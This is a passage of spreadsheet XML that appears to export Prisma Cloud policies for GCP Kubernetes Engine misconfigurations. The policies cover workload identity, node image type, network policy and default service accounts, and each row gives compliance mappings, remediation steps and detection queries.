          <t>ISO/IEC 27017:2015, ISO 27002:2022, HIPAA, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-172, ISO/IEC 27017:2015, CIS Controls v8.1, NIST CSF v2.0, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v.4.0.6, CIS v1.2.0 (GKE), ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, tadenugba Copy of CIS v1.1.0 (GKE), Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CIS v1.4.0 (GKE) - Level 1, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Australian Energy Sector Cyber Security Framework (AESCSF), NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.1.0 (GKE), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, DORA, CSA CCM v.4.0.1, CIS v1.5.0 (GKE) - Level 1, ISO/IEC 27002:2013, Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS v1.1.0 (GKE), CIS Controls v8, ISO 27002:2022, ISO/IEC 27017:2015, CRI Profile v2.0, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, CIS v1.3.0 (GKE) - Level 1, ISO/IEC 27002:2013, ITSG-33, CSA CCM v.4.0.1, CIS Controls v8, SOC 2, tadenugba Copy of CIS v1.1.0 (GKE), ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 1, ISO 27002:2022, New Zealand Information Security Manual (NZISM v3.4), Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CIS Controls v7.1, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST SP 800-171 Revision 2, FFIEC, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2885" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2885" s="2" t="inlineStr"/>
      <c r="D2885" t="inlineStr"/>
      <c r="E2885" t="inlineStr"/>
      <c r="F2885" t="inlineStr"/>
      <c r="G2885" t="b">
        <v>1</v>
      </c>
      <c r="H28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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2885" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2885" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine cluster workload identity is disabled</t>
        </is>
      </c>
      <c r="L2885" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2885" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2885" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2885" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2885" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2885" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2885" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2885" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2885" t="b">
        <v>0</v>
      </c>
      <c r="U2885" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2885" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2885" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes Engine clusters for which workload identity is disabled. Manual approaches for authenticating Kubernetes workloads violates the principle of least privilege on a multi-tenanted node when one pod needs to have access to a service, but every other pod on the node that uses the service account does not. Enabling Workload Identity manages the distribution and rotation of Service account keys for the workloads to use.</t>
        </is>
      </c>
      <c r="X2885" t="inlineStr">
        <is>
          <t>1. Log in to GCP console
2. Navigate to service 'Kubernetes Engine'(Left Panel)
3. Select the reported cluster from the available list
4. Under section 'Security', click on edit icon for 'Workload Identity'
5. Click on the checkbox 'Enable Workload Identity'
6. Ensure that the Workload Identity Namespace is set to the namespace of the GCP
project containing the cluster, e.g: $PROJECT_ID.svc.id.goog
7. Click on 'SAVE CHANGES'
8. After enabling, go to tab 'NODES'
9. To investigate each node pool, Click on 'Edit', In section 'Security', select the 'Enable GKE Metadata Server' checkbox
10. Click on 'SAVE'</t>
        </is>
      </c>
      <c r="Y2885" t="inlineStr"/>
      <c r="Z2885" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =status equals "RUNNING" and resourceLabels.goog-composer-version does not start with "composer-1" and ((workloadIdentityConfig[*] does not exist) or (workloadIdentityConfig[*] exists and (nodePools[?any(config.workloadMetadataConfig does not contain GKE_METADATA)] exists)))</t>
        </is>
      </c>
      <c r="AA2885" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2885" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2885" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-617</t>
        </is>
      </c>
      <c r="AD2885" t="b">
        <v>1</v>
      </c>
      <c r="AE2885" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2885" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>c696cf7d-c397-4be8-9183-62676d2afde1</t>
        </is>
      </c>
      <c r="AI2885" t="inlineStr">
        <is>
          <t>24840516-e1f8-4369-9907-1de7edbd70af</t>
        </is>
      </c>
      <c r="AJ2885" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2885" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2886">
      <c r="A2886" t="inlineStr">
        <is>
          <t>Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, CIS v1.2.0 (GKE), CIS v1.4.0 (GKE) - Level 2, CIS v1.0.0 (GCP), Secure Controls Framework (SCF) - 2024.2, CIS v1.3.0 (GKE) - Level 2, CIS Controls v8, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CIS v1.5.0 (GKE) - Level 2, NIST SP 800-171 Revision 3, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CIS v1.1.0 (GKE), ISO/IEC 27017:2015, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v3.2.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, tadenugba Copy of CIS v1.1.0 (GKE), CIS Controls v7.1, MITRE ATT&amp;CK v8.2 [Deprecated], CIS Controls v7.1, CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2886" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2886" s="2" t="inlineStr"/>
      <c r="D2886" t="inlineStr"/>
      <c r="E2886" t="inlineStr"/>
      <c r="F2886" t="inlineStr"/>
      <c r="G2886" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2886" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2886" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters not using Container-Optimized OS for Node image</t>
        </is>
      </c>
      <c r="L2886" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2886" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2886" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2886" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2886" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2886" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2886" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2886" t="inlineStr"/>
      <c r="T2886" t="b">
        <v>0</v>
      </c>
      <c r="U2886" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2886" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2886" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which do not have a container-optimized operating system for node image. Container-Optimized OS is an operating system image for your Compute Engine VMs that is optimized for running Docker containers. By using Container-Optimized OS for node image, you can bring up your Docker containers on Google Cloud Platform quickly, efficiently, and securely. The Container-Optimized OS node image is based on a recent version of the Linux kernel and is optimized to enhance node security. It is also regularly updated with features, security fixes, and patches. The Container-Optimized OS image provides better support, security, and stability than other images.</t>
        </is>
      </c>
      <c r="X2886" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters
4. From the list of clusters, choose the reported cluster
5. Under Node Pools, For Node image click on 'Change'
6. Choose 'Container-Optimized OS (cos)' 
7. Click on Change 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-14</t>
        </is>
      </c>
      <c r="Y2886" t="inlineStr"/>
      <c r="Z2886" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'nodeConfig.imageType does not exist or nodeConfig.imageType does not start with COS'
{"category":"Kubernetes","resourceTypes":["google_container_node_pool"]}</t>
        </is>
      </c>
      <c r="AA2886" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2886" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2886" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-149-CKV_GCP_22</t>
        </is>
      </c>
      <c r="AD2886" t="b">
        <v>1</v>
      </c>
      <c r="AE2886" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2886" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>e41fea47-678f-4aeb-97a8-bdf721d08e57</t>
        </is>
      </c>
      <c r="AI2886" t="inlineStr">
        <is>
          <t>84aedafc-aec4-4e7d-a604-a0a0ea1fd3ca</t>
        </is>
      </c>
      <c r="AJ2886" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2886" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2887">
      <c r="A2887" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, PCI DSS v4.0, CIS v1.3.0 (GKE) - Level 1, CIS v1.2.0 (GKE), ISO/IEC 27017:2015, ISO 27001:2013, CIS Controls v8.1, APRA (CPS 234) Information Security, NIST CSF v2.0, PCI DSS v4.0, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.6, CSA CCM v.4.0.1, CIS v1.0.0 (GCP), APRA (CPS 234) Information Security, CIS v1.5.0 (GKE) - Level 1, Copy of ACSC Information Security Manual (ISM)-clone, FFIEC, CRI Profile v1.2.1, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v.4.0.6, SOC 2, CIS Controls v7.1, CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, Copy of CIS Controls v8, CIS v1.1.0 (GKE), PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, NIST 800-53 Rev 5, SOC 2, ISO 27001:2013, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CIS Controls v7.1, CIS v1.4.0 (GKE) - Level 1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, tadenugba Copy of CIS v1.1.0 (GKE), CSA CCM v4.0.12, ISO/IEC 27002:2013, ISO/IEC 27017:2015, NIST 800-53 Rev4, CSA CCM v.4.0.6, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v4.0, CIS Controls v8, FFIEC, PCI DSS v4.0, APRA (CPS 234) Information Security, CIS Controls v8.1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, SOC 2, CIS Controls v8.1, PCI DSS v3.2.1, CSA CCM v3.0.1, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27002:2013, CIS Controls v8, kashan ACSC Information Security Manual (ISM), CCPA 2018, ISO/IEC 27001:2022, Copy of CIS Controls v8, PIPEDA, CRI Profile v1.2.1, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Sarbanes Oxley Act (SOX), FFIEC, NIST SP 800-171 Revision 2, ISO 27002:2022, NIST SP 800-172, CSA CCM v3.0.1, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27018:2019, PCI DSS v4.0, FFIEC</t>
        </is>
      </c>
      <c r="B2887" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2887" s="2" t="inlineStr"/>
      <c r="D2887" t="inlineStr"/>
      <c r="E2887" t="inlineStr"/>
      <c r="F2887" t="inlineStr"/>
      <c r="G2887" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2887" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2887" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Network policy disabled</t>
        </is>
      </c>
      <c r="L2887" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2887" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2887" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2887" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2887" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2887" t="inlineStr">
        <is>
          <t>CIS Control 4</t>
        </is>
      </c>
      <c r="R2887" t="inlineStr">
        <is>
          <t>4.5</t>
        </is>
      </c>
      <c r="S2887" t="inlineStr"/>
      <c r="T2887" t="b">
        <v>0</v>
      </c>
      <c r="U2887" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2887" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2887" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which have disabled Network policy. A network policy defines how groups of pods are allowed to communicate with each other and other network endpoints. By enabling network policy in a namespace for a pod, it will reject any connections that are not allowed by the network policy.</t>
        </is>
      </c>
      <c r="X2887" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters
4. From the list of clusters, choose the reported cluster
5. Under 'Networking', Click on EDIT button for 'Calico Kubernetes Network policy'
6. Select 'Enable Calico Kubernetes network policy for control plane'
7. Click on Save
8. Repeat Step 5 and Select 'Enable Calico Kubernetes network policy for nodes'
9. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-7</t>
        </is>
      </c>
      <c r="Y2887" t="inlineStr"/>
      <c r="Z2887" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = networkConfig.datapathProvider does not equal ADVANCED_DATAPATH and (addonsConfig.networkPolicyConfig.disabled is true or networkPolicy.enabled does not exist or networkPolicy.enabled is false )
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2887" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2887" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2887" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-150-CKV_GCP_12</t>
        </is>
      </c>
      <c r="AD2887" t="b">
        <v>1</v>
      </c>
      <c r="AE2887" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2887" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>6ddbfdfe-3936-43d0-8157-97a7899beae6</t>
        </is>
      </c>
      <c r="AI2887" t="inlineStr">
        <is>
          <t>7d4b6325-1349-400b-bb6a-3ac05387887c</t>
        </is>
      </c>
      <c r="AJ2887" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2887" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2888">
      <c r="A2888" t="inlineStr">
        <is>
          <t>HITRUST CSF v9.3 [Deprecated], APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v3.0.1, Demo_Daryl ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CSA CCM v3.0.1, Fedramp (Moderate), CDC NIST 800-53 Rev4, CSA CCM v3.0.1, CSA CCM v3.0.1, tadenugba Copy of CIS v1.1.0 (GKE), MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v3.0.1, APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, NIST SP 800-172, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST CSF v.11.2.0, NIST SP 800-171 Revision 3, ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CIS Controls v8.1, CIS v1.4.0 (GKE) - Level 1, PCI DSS v4.0, SOC 2, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, ISO/IEC 27018:2019, PCI DSS v3.2.1, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CIS v1.2.0 (GKE), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, SOC 2, CIS v1.1.0 (GKE), ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS Controls v7.1, MITRE ATT&amp;CK v8.2 [Deprecated], NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Risk Management in Technology (RMiT), NIST CSF v2.0, MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v3.0.1, ISO 27001:2013, ISO/IEC 27002:2013, NIST 800-53 Rev 5, CIS v1.3.0 (GKE) - Level 1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, CIS v1.0.0 (GCP), SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2024.2, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8, CSA CCM v.4.0.1, CSA CCM v3.0.1, CSA CCM v3.0.1, CIS Controls v7.1, NIST CSF v2.0, TX-RAMP Level 1, ISO/IEC 27018:2019, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO 27001:2013, ISO/IEC 27002:2013, Copy of CIS Controls v8, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, NIST 800-53 Rev4, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CIS Controls v7.1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], Brazilian Data Protection Law (LGPD), CDC NIST 800-53 Rev4, CIS v1.5.0 (GKE) - Level 1</t>
        </is>
      </c>
      <c r="B2888" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2888" s="2" t="inlineStr"/>
      <c r="D2888" t="inlineStr"/>
      <c r="E2888" t="inlineStr"/>
      <c r="F2888" t="inlineStr"/>
      <c r="G2888" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2888" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2888" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Cluster Nodes have default Service account for Project access</t>
        </is>
      </c>
      <c r="L2888" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2888" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2888" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2888" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2888" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2888" t="inlineStr">
        <is>
          <t>AC-1</t>
        </is>
      </c>
      <c r="R2888" t="inlineStr">
        <is>
          <t>AC-6 (5)</t>
        </is>
      </c>
      <c r="S2888" t="inlineStr"/>
      <c r="T2888" t="b">
        <v>0</v>
      </c>
      <c r="U2888" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2888" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2888" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Cluster Nodes which have default Service account for Project access. By default, Kubernetes Engine nodes are given the Compute Engine default service account. This account has broad access and more permissions than are required to run your Kubernetes Engine cluster. You should create and use a least privileged service account to run your Kubernetes Engine cluster instead of using the Compute Engine default service account. If you are not creating a separate service account for your nodes, you should limit the scopes of the node service account to reduce the possibility of a privilege escalation in an attack.</t>
        </is>
      </c>
      <c r="X2888" t="inlineStr">
        <is>
          <t>GCP Kubernetes Clusters Service account can be chosen only at the time of creation of clusters. So to fix this alert, create a new cluster with the least privileged Service account and then migrate all required cluster node data from the reported cluster to this new cluster.
To create the cluster with new Service account which has privileges as you needed, perform following steps:
1. Login to GCP Portal
2. Click on 'CREATE CLUSTER'
3. Choose required name/value for cluster fields
4. Click on 'More'
5. Choose 'Service account' which has the least privilege under Project access section, Instead of default 'Compute Engine default service account'
NOTE: The Compute Engine default service account by default, has devstorage.read_only, logging.write, monitoring, service.management.readonly, servicecontrol, and trace.append privileges/scopes.
You can configure a service account with more restrictive privileges and assign the same.
6. Click on 'Create' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/ensure-gke-clusters-are-not-running-using-the-compute-engine-default-service-account</t>
        </is>
      </c>
      <c r="Y2888" t="inlineStr"/>
      <c r="Z2888" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'nodePools[*].config.serviceAccount contains default'
{"category":"Kubernetes","resourceTypes":["google_project_default_service_accounts"]}</t>
        </is>
      </c>
      <c r="AA2888" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2888" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2888" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-154-CKV2_GCP_1</t>
        </is>
      </c>
      <c r="AD2888" t="b">
        <v>1</v>
      </c>
      <c r="AE2888" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2888" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>d4a28b1f-9a9b-4a40-874d-9da7f9d4e8a6</t>
        </is>
      </c>
      <c r="AI2888" t="inlineStr">
        <is>
          <t>cc010769-cdf3-46f0-8c76-d5c7ae355015</t>
        </is>
      </c>
      <c r="AJ2888" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2888" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2889">
      <c r="A2889" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Risk Management in Technology (RMiT), NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 